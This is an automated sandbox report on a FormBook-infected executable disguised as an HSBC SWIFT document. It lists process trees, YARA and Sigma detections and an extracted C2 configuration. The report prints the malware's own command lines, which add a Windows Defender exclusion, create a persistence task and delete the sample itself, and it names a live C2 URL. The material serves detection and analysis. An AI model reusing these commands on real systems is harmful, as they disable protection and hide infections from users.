Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report HSBC_SWIFT-20-11-2021.exe

Overview

General Information

Sample Name:HSBC_SWIFT-20-11-2021.exe
Analysis ID:528767
MD5:3e9bddcd8ede94beb73d43d4d3446fe7
SHA1:27723f2fb360a300df95c22fd1d8353a5d940455
SHA256:4518c17e858eaae9a38cdf5953bd7d0cad3c3fd5fa2b9a5b84e0cad5e8ecfc5e
Tags:exeFormbookHSBC
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Self deletion via cmd delete
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • HSBC_SWIFT-20-11-2021.exe (PID: 7156 cmdline: "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe" MD5: 3E9BDDCD8EDE94BEB73D43D4D3446FE7)
    • powershell.exe (PID: 5828 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5576 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 4528 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • HSBC_SWIFT-20-11-2021.exe (PID: 6020 cmdline: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe MD5: 3E9BDDCD8EDE94BEB73D43D4D3446FE7)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 1972 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5868 cmdline: /c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • explorer.exe (PID: 3120 cmdline: explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.164661.com/ntfs/"], "decoy": ["cast-host.com", "sheenwoman.com", "cateringpairs.com", "butikgamis.com", "esd66.com", "beautystaze.com", "findavetnearme.com", "lyketigers.com", "nesboutiqe.com", "jadeutil.com", "survivalfresh.com", "realestatebramlett.com", "glorynap.com", "awards.institute", "huangtapps.com", "beyondwithyou.com", "cryptocustomerhelp.com", "plataformasoma.net", "lstpark.com", "noalareelecionindefinida.com", "supersconti.xyz", "emotors-invoice.com", "adamelsouk.com", "pellondo.com", "itstimewashington.com", "ss9n.xyz", "wecuxs.com", "wonderfulwithyou.com", "livetvnews24.com", "humanblessings.com", "soins-sophro.website", "pailuanshizhi.com", "balanzasdeplataformaperu.com", "wingboxonline.com", "importexportjessi.com", "revenberggmemergencyupgrade.com", "comicvan.com", "docomoaj.xyz", "accelerate6.com", "englishforbreakfast.com", "braapboxclub.com", "damana-vetements.com", "corinnewehby.com", "tonesify.com", "growversa.com", "cemetrasbeautyboutique.com", "newbalancecore.xyz", "cqguipu.com", "vdcasinolinkegit.club", "sednayachts.com", "alinatargetpro.com", "pawcomart.com", "aisle5.store", "dayinburgas.com", "c2batxpvme9ey3poams7369.com", "everythingby-b.com", "laliinparfumeri.com", "ntwapedi.com", "mrbubblesftlauderdale.com", "averiansmom.com", "ipelle.com", "waiting-game.com", "online-security.support", "hartfortlife.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
        8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 17 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspicius Add Task From User AppData TempShow sources
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe" , ParentImage: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, ParentProcessId: 7156, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp, ProcessId: 4528
          Sigma detected: Powershell Defender ExclusionShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe" , ParentImage: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, ParentProcessId: 7156, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, ProcessId: 5828
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 1972
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe" , ParentImage: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, ParentProcessId: 7156, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, ProcessId: 5828
          Sigma detected: T1086 PowerShell ExecutionShow sources
          Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132823685347918465.5828.DefaultAppDomain.powershell

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.164661.com/ntfs/"], "decoy": ["cast-host.com", "sheenwoman.com", "cateringpairs.com", "butikgamis.com", "esd66.com", "beautystaze.com", "findavetnearme.com", "lyketigers.com", "nesboutiqe.com", "jadeutil.com", "survivalfresh.com", "realestatebramlett.com", "glorynap.com", "awards.institute", "huangtapps.com", "beyondwithyou.com", "cryptocustomerhelp.com", "plataformasoma.net", "lstpark.com", "noalareelecionindefinida.com", "supersconti.xyz", "emotors-invoice.com", "adamelsouk.com", "pellondo.com", "itstimewashington.com", "ss9n.xyz", "wecuxs.com", "wonderfulwithyou.com", "livetvnews24.com", "humanblessings.com", "soins-sophro.website", "pailuanshizhi.com", "balanzasdeplataformaperu.com", "wingboxonline.com", "importexportjessi.com", "revenberggmemergencyupgrade.com", "comicvan.com", "docomoaj.xyz", "accelerate6.com", "englishforbreakfast.com", "braapboxclub.com", "damana-vetements.com", "corinnewehby.com", "tonesify.com", "growversa.com", "cemetrasbeautyboutique.com", "newbalancecore.xyz", "cqguipu.com", "vdcasinolinkegit.club", "sednayachts.com", "alinatargetpro.com", "pawcomart.com", "aisle5.store", "dayinburgas.com", "c2batxpvme9ey3poams7369.com", "everythingby-b.com", "laliinparfumeri.com", "ntwapedi.com", "mrbubblesftlauderdale.com", "averiansmom.com", "ipelle.com", "waiting-game.com", "online-security.support", "hartfortlife.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORY
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: HSBC_SWIFT-20-11-2021.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: HSBC_SWIFT-20-11-2021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.479620363.0000000003930000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.477765474.000000000198F000.00000040.00000001.sdmp, HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, msdt.exe, 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, msdt.exe, 00000014.00000003.475842542.00000000050C0000.00000004.00000001.sdmp, msdt.exe, 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HSBC_SWIFT-20-11-2021.exe, HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.477765474.000000000198F000.00000040.00000001.sdmp, HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, msdt.exe, 00000014.00000003.475842542.00000000050C0000.00000004.00000001.sdmp, msdt.exe, 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.479620363.0000000003930000.00000040.00020000.sdmp

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.164661.com/ntfs/
          Source: explorer.exe, 0000001C.00000000.610554099.000000000600C000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000A.00000000.405790270.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.423799260.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.385812561.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.455497902.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
